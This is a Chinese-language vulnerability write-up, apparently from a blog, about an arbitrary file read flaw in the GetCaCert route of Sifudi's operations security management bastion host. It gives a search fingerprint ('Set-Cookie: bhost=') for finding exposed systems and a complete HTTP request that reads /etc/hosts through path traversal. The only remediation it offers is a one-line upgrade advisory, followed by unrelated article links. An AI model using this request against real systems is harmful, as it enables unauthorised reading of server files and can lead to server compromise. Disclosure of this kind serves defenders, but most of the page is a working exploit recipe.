思福迪运维安全管理系统 任意文件读取漏洞

产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机

漏洞概述

由于思福迪运维安全管理系统 GetCaCert路由存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意文件敏感内容,可能导致攻击者后续获取到相关的服务器权限

资产测绘

banner="Set-Cookie: bhost=" || header="Set-Cookie: bhost="

漏洞复现

lua 复制代码
GET /bhost/GetCaCert?a1=../../../../../etc/hosts HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

base64解码,获取明文内容:

整改建议

升级至安全版本

相关推荐
网络之路Blog22 分钟前
【实战中提升自己】内网安全部署之端口隔离与MAC地址认证
安全·macos·网络之路一天·华为华三数通基础·华为华三企业实战架构·华为中小型企业实战·华为华三计算机网络基础
哈哈幸运29 分钟前
Linux Sed 深度解析:从日志清洗到 K8s 等12个高频场景
linux·运维·编辑器·sed
masx2002 小时前
升级uptime-kuma版本2.0.0-beta.2的cloudflared版本到2025.4.0
运维·后端
杨凯凡2 小时前
Linux安全防护:全方位服务安全配置指南
linux·运维·服务器·安全
李菠菜2 小时前
CentOS系统中重置Root用户密码的完整步骤详解
linux·运维
Nightwish52 小时前
Linux随记(十七)
linux·运维·服务器
德克西尔DrKsir2 小时前
石油化工行业氢气浓度检测仪的应用与选择
安全
付出不多3 小时前
Linux——系统安全及应用
linux·运维·系统安全
独孤歌3 小时前
告别频繁登录:打造用户无感的 Token 刷新机制
安全·面试
惊起白鸽4504 小时前
系统安全及应用
安全·系统安全